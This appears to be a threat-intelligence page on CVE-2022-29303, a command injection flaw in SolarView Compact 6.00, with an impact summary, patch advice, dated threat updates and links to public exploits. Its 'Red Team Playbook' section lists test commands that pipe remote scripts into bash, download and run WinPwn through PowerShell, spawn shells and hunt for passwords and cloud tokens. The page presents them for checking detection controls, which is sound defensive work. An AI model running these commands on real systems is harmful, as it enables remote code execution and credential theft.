CVE-2022-29303
Overview
The vulnerability is a command injection flaw rooted in insufficient input validation within the conf_mail.php script of SolarView Compact version 6.00 firmware. Specifically, the mail_address parameter fails to sanitize user input, allowing arbitrary shell commands to be injected and executed on the underlying operating system. This flaw affects the web interface component responsible for mail configuration settings.
Vulnerability Description
SolarView Compact ver.6.00 was discovered to contain a command injection vulnerability via conf_mail.php.
Impact
An unauthenticated attacker can execute arbitrary system commands remotely by exploiting this vulnerability, gaining full control over the affected device. This includes the ability to manipulate system files, disrupt operations, or pivot to other network assets. The lack of authentication or user interaction requirements significantly lowers the attack complexity, enabling remote compromise that threatens confidentiality, integrity, and availability of the system and connected infrastructure.
Solution
Users should upgrade SolarView Compact firmware to a version later than 6.00 where this command injection vulnerability is addressed. Vendor advisories and patch instructions are available through the official Contec support channels and referenced exploit databases. Until patching, disabling or restricting access to the /conf_mail.php endpoint via network controls is recommended to mitigate exposure.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The command injection vulnerability found in SolarView Compact version 6.00 allows an attacker to execute arbitrary commands on the underlying operating system through the manipulation of input parameters in the conf_mail.php script. This vulnerability arises from insufficient input validation and sanitization, enabling an attacker to inject malicious commands that the system will execute with the privileges of the web server. The flaw is particularly concerning because it can be exploited remotely, requiring only access to the web interface of the affected product. Given the nature of command injection, the potential for unauthorized access to sensitive system functionalities and data is significant.
Attack vectors for this vulnerability are diverse, as an attacker could exploit it through various means, including phishing campaigns or automated scanning tools that target exposed web applications. Once the attacker identifies the vulnerable endpoint, they can craft a malicious request to the conf_mail.php script, injecting commands that could lead to the execution of arbitrary code. For example, an attacker might use this vulnerability to create a reverse shell, allowing them to maintain persistent access to the compromised system. Additionally, the attacker could manipulate the system to exfiltrate sensitive data, modify system configurations, or disrupt services, leading to broader implications for the organization.
The real-world impact of this vulnerability is profound, particularly for organizations relying on the SolarView Compact system for critical operations. The high CVSS score of 9.8 indicates a severe risk, suggesting that successful exploitation could lead to complete system compromise. Businesses may face significant operational disruptions, loss of sensitive data, and potential legal ramifications due to non-compliance with data protection regulations. Furthermore, the reputational damage stemming from a security breach can lead to a loss of customer trust and confidence, which can have long-lasting effects on an organization’s market position.
To detect and mitigate the risks associated with this command injection vulnerability, organizations should implement a multi-faceted approach. Regular security assessments, including vulnerability scanning and penetration testing, can help identify and remediate weaknesses in the system. Additionally, employing web application firewalls (WAFs) can provide an additional layer of protection by filtering and monitoring HTTP requests to detect and block malicious payloads. It is also crucial to ensure that all software, including the SolarView Compact system, is kept up to date with the latest security patches and updates. Educating staff about secure coding practices and the importance of input validation can further reduce the risk of similar vulnerabilities in the future.
In conclusion, the command injection vulnerability in SolarView Compact version 6.00 presents a critical threat to organizations utilizing this system. The potential for exploitation through various attack vectors underscores the need for proactive security measures. By implementing robust detection and mitigation strategies, organizations can significantly reduce their risk exposure and protect their assets against the adverse effects of such vulnerabilities. Continuous vigilance and a commitment to security best practices are essential in safeguarding against evolving cyber threats.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the command injection vulnerability in SolarView Compact version 6.00. This increase coincides with the emergence of new publicly available proof-of-concept exploits and scripts, broadening the toolkit accessible to threat actors. Our telemetry indicates that adversaries are actively incorporating these tools into their operations, which raises the likelihood of successful compromise in environments running the affected software. Although ransomware usage linked to this vulnerability remains unconfirmed, the expanded exploit landscape significantly elevates the risk profile. Consequently, the threat level associated with CVE-2022-29303 has intensified, underscoring the urgency for defenders to enhance monitoring and detection capabilities around this vulnerability.
Update 2 — July 04, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2022-29303, indicating increased adversary interest and potential exploitation attempts. This uptick in telemetry, while not yet accompanied by evidence of ransomware deployment, suggests that threat actors are actively probing or leveraging the command injection vulnerability in SolarView Compact version 6.00. The availability of multiple new proof-of-concept exploits continues to lower the barrier for exploitation, potentially broadening the attacker base. Consequently, the threat level associated with this vulnerability has intensified, underscoring a heightened risk of compromise in affected environments and necessitating increased vigilance in monitoring and detection efforts.
Update 3 — August 02, 2026
CSURFACE threat intelligence has detected a modest but meaningful uptick in exploitation attempts targeting the command injection vulnerability in SolarView Compact version 6.00. This increase in activity, coupled with the sustained availability of multiple proof-of-concept exploits, indicates that adversaries continue to actively probe and potentially exploit this flaw. Although the EPSS score has experienced a slight decline, it remains near the maximum threshold, reflecting persistent high exploitability. The absence of confirmed ransomware deployment linked to this vulnerability does not diminish the elevated risk, as the growing exploitation footprint suggests expanding attacker interest and capability. Consequently, the threat level remains critical, with defenders needing to maintain heightened situational awareness given the ongoing adversary engagement and the ease of exploitation facilitated by publicly accessible tools.
Update 4 — August 18, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2022-29303, indicating a modest resurgence in adversary activity despite a marginal decline in the EPSS score. This uptick is reflected in our telemetry as a subtle rise in detection events, suggesting that threat actors continue to probe SolarView Compact environments for command injection opportunities. The persistence of publicly available proof-of-concept exploits further lowers the barrier for exploitation, maintaining the vulnerability’s attractiveness to a broad range of attackers. Although ransomware usage linked to this vulnerability remains unconfirmed, the sustained adversary interest underscores the potential for this flaw to be leveraged in future attack campaigns. Consequently, the overall threat level remains critical, with defenders needing to remain vigilant as the exploitation landscape shows signs of renewed activity without significant mitigation progress.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Contec | Sv-Cpt-Mc310 Firmware | 6.00 |
cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| SolarView Compact 6.0 - OS Command Injection | Ahmed Alroky | remote | hardware | - | View |
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Chocapikk/CVE-2022-29303
Python script to exploit CVE-2022-29303
|
Chocapikk | 3 | 1 | 2022-05-31 | View |
|
1f3lse/CVE-2022-29303
Python script to exploit CVE-2022-29303
|
1f3lse | 0 | 2 | 2022-06-01 | View |
|
camgoering/solarview-ics-vulnerability-analysis
Threat model and vulnerability analysis of Contec SolarView Compact (CVE-2022-29303)
|
camgoering | 0 | 0 | 2026-08-26 | View |
|
PoC
|
- | 0 | 0 | - | View |
Threat Feed
14 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-29303 |
| drive.google.com |
GitHub CVE
x_refsource_MISC
|
https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/167183/SolarView-Compact-6.0-Command-Injection.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-29303 |